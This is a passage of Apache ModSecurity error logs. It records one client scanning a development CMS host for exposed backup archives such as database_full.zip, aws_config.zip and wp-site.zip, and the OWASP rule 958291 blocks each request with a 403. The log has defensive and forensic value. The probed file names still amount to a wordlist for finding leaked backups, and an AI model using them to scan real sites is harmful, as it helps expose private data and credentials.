"8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/repo.zip"] [unique_id "aa2sKmaTUOdovAC89_RAvgAAAog"] [Sun Mar 08 19:04:42.746298 2026] [:error] [pid 11078:tid 11129] [client 35.189.151.148:38902] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_bucket.zip"] [unique_id "aa2sKn-dmvIeGeY060kitgAAAdM"] [Sun Mar 08 19:04:42.746306 2026] [:error] [pid 13605:tid 13610] [client 35.189.151.148:38464] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/metrics.zip"] [unique_id "aa2sKjLobmDOvyRcAEhf1AAAAMM"] [Sun Mar 08 19:04:42.746306 2026] [:error] [pid 13471:tid 13496] [client 35.189.151.148:39982] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/lib.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4aQAAABU"] [Sun Mar 08 19:04:42.747329 2026] [:error] [pid 13472:tid 13511] [client 35.189.151.148:40920] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/version2.zip"] [unique_id "aa2sKl3UyizU6P-l0YL9DwAAAEg"] [Sun Mar 08 19:04:42.747352 2026] [:error] [pid 13605:tid 13629] [client 35.189.151.148:42408] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp_archive.zip"] [unique_id "aa2sKjLobmDOvyRcAEhf1QAAANY"] [Sun Mar 08 19:04:42.748579 2026] [:error] [pid 11078:tid 11134] [client 35.189.151.148:43530] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp-complete.zip"] [unique_id "aa2sKn-dmvIeGeY060kitwAAAdg"] [Sun Mar 08 19:04:42.748584 2026] [:error] [pid 13472:tid 13510] [client 35.189.151.148:38058] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-policy.zip"] [unique_id "aa2sKl3UyizU6P-l0YL9EAAAAEc"] [Sun Mar 08 19:04:42.748624 2026] [:error] [pid 11078:tid 11128] [client 35.189.151.148:41922] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_config.zip"] [unique_id "aa2sKn-dmvIeGeY060kiuAAAAdI"] [Sun Mar 08 19:04:42.748633 2026] [:error] [pid 13605:tid 13615] [client 35.189.151.148:42656] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-metrics.zip"] [unique_id "aa2sKjLobmDOvyRcAEhf1gAAAMg"] [Sun Mar 08 19:04:42.748687 2026] [:error] [pid 12902:tid 12944] [client 35.189.151.148:40584] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/complete.zip"] [unique_id "aa2sKmaTUOdovAC89_RAvwAAAok"] [Sun Mar 08 19:04:42.748855 2026] [:error] [pid 11078:tid 11113] [client 35.189.151.148:41574] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/database_full.zip"] [unique_id "aa2sKn-dmvIeGeY060kiuQAAAcM"] [Sun Mar 08 19:04:42.749097 2026] [:error] [pid 27307:tid 27316] [client 35.189.151.148:40628] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/deployment.zip"] [unique_id "aa2sKgo1nI2o7tYBWw9SagAAAUc"] [Sun Mar 08 19:04:42.749281 2026] [:error] [pid 27307:tid 27321] [client 35.189.151.148:38326] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/assets.zip"] [unique_id "aa2sKgo1nI2o7tYBWw9SawAAAUw"] [Sun Mar 08 19:04:42.749415 2026] [:error] [pid 13471:tid 13493] [client 35.189.151.148:41518] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup/www.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4agAAABI"] [Sun Mar 08 19:04:42.749542 2026] [:error] [pid 13473:tid 13515] [client 35.189.151.148:44762] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws_db.zip"] [unique_id "aa2sKkwwZGElJGd8aN_6LQAAAIE"] [Sun Mar 08 19:04:42.750638 2026] [:error] [pid 13471:tid 13485] [client 35.189.151.148:42724] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/websites.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4awAAAAo"] [Sun Mar 08 19:04:42.750667 2026] [:error] [pid 29564:tid 29576] [client 35.189.151.148:37136] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/rpc.zip"] [unique_id "aa2sKgemqWLB0zKFm0TYVAAAAQQ"] [Sun Mar 08 19:04:42.750672 2026] [:error] [pid 13472:tid 13535] [client 35.189.151.148:43524] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/archive-1.zip"] [unique_id "aa2sKl3UyizU6P-l0YL9EQAAAFQ"] [Sun Mar 08 19:04:42.750703 2026] [:error] [pid 12902:tid 12959] [client 35.189.151.148:43770] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/complete-backup.zip"] [unique_id "aa2sKmaTUOdovAC89_RAwAAAApg"] [Sun Mar 08 19:04:42.751572 2026] [:error] [pid 11078:tid 11114] [client 35.189.151.148:38344] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/archive-3.zip"] [unique_id "aa2sKn-dmvIeGeY060kiugAAAcQ"] [Sun Mar 08 19:04:42.751590 2026] [:error] [pid 13472:tid 13505] [client 35.189.151.148:38100] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/3.zip"] [unique_id "aa2sKl3UyizU6P-l0YL9EgAAAEM"] [Sun Mar 08 19:04:42.751596 2026] [:error] [pid 13471:tid 13499] [client 35.189.151.148:38258] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/shop-backup.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4bAAAABg"] [Sun Mar 08 19:04:42.752724 2026] [:error] [pid 13472:tid 13521] [client 35.189.151.148:40970] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp-archive.zip"] [unique_id "aa2sKl3UyizU6P-l0YL9EwAAAE4"] [Sun Mar 08 19:04:42.752753 2026] [:error] [pid 29564:tid 29585] [client 35.189.151.148:43714] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp-export.zip"] [unique_id "aa2sKgemqWLB0zKFm0TYVgAAAQ0"] [Sun Mar 08 19:04:42.752766 2026] [:error] [pid 29564:tid 29577] [client 35.189.151.148:43298] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/run.zip"] [unique_id "aa2sKgemqWLB0zKFm0TYVQAAAQU"] [Sun Mar 08 19:04:42.752819 2026] [:error] [pid 13471:tid 13480] [client 35.189.151.148:44338] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/11.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4bgAAAAU"] [Sun Mar 08 19:04:42.752855 2026] [:error] [pid 12902:tid 12935] [client 35.189.151.148:38234] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/database_complete.zip"] [unique_id "aa2sKmaTUOdovAC89_RAwQAAAoA"] [Sun Mar 08 19:04:42.752927 2026] [:error] [pid 13471:tid 13487] [client 35.189.151.148:43458] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/2023.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4bQAAAAw"] [Sun Mar 08 19:04:42.753955 2026] [:error] [pid 13471:tid 13498] [client 35.189.151.148:39344] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/template.zip"] [unique_id "aa2sKr8gLDtA4xTIJqD4bwAAABc"] [Sun Mar 08 19:04:42.753984 2026] [:error] [pid 11078:tid 11130] [client 35.189.151.148:42490] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_2020.zip"] [unique_id "aa2sKn-dmvIeGeY060kiuwAAAdQ"] [Sun Mar 08 19:04:42.754005 2026] [:error] [pid 13472:tid 13513] [client 35.189.151.148:42176] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/www-backup.zip"] [unique_id "aa2sKl3UyizU6P-l0YL9FAAAAEo"] [Sun Mar 08 19:04:42.754013 2026] [:error] [pid 13472:tid 13523] [client 35.189.151.148:39954] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/htdocs.zip"] [unique_id "aa2sKl3UyizU6P-l0YL9FQAAAE8"] [Sun Mar 08 19:04:42.754024 2026] [:error] [pid 27307:tid 27319] [client 35.189.151.148:44596] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/backup_complete.zip"] [unique_id "aa2sKgo1nI2o7tYBWw9SbAAAAUo"] [Sun Mar 08 19:04:42.754342 2026] [:error] [pid 11078:tid 11119] [client 35.189.151.148:37346] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/wp-site.zip"] [unique_id "aa2sKn-dmvIeGeY060kivAAAAck"] [Sun Mar 08 19:04:42.754432 2026] [:error] [pid 12902:tid 12955] [client 35.189.151.148:41004] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/include.zip"] [unique_id "aa2sKmaTUOdovAC89_RAwgAAApQ"] [Sun Mar 08 19:04:42.754968 2026] [:error] [pid 13472:tid 13528] [client 35.189.151.148:37780] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/emergency.zip"] [unique_id "aa2sKl3UyizU6P-l0YL9FgAAAFE"] [Sun Mar 08 19:04:42.755052 2026] [:error] [pid 27307:tid 27322] [client 35.189.151.148:43104] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/4.zip"] [unique_id "aa2sKgo1nI2o7tYBWw9SbQAAAU0"] [Sun Mar 08 19:04:42.755215 2026] [:error] [pid 12902:tid 12942] [client 35.189.151.148:41456] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/options.zip"] [unique_id "aa2sKmaTUOdovAC89_RAwwAAAoc"] [Sun Mar 08 19:04:42.755224 2026] [:error] [pid 12902:tid 12946] [client 35.189.151.148:39920] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/uat-backup.zip"] [unique_id "aa2sKmaTUOdovAC89_RAxAAAAos"] [Sun Mar 08 19:04:42.755350 2026] [:error] [pid 13473:tid 13526] [client 35.189.151.148:41998] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/aws-files.zip"] [unique_id "aa2sKkwwZGElJGd8aN_6LgAAAIY"] [Sun Mar 08 19:04:42.755667 2026] [:error] [pid 13471:tid 13478] [client 35.189.151.148:40748] [client 35.189.151.148] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-7"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag 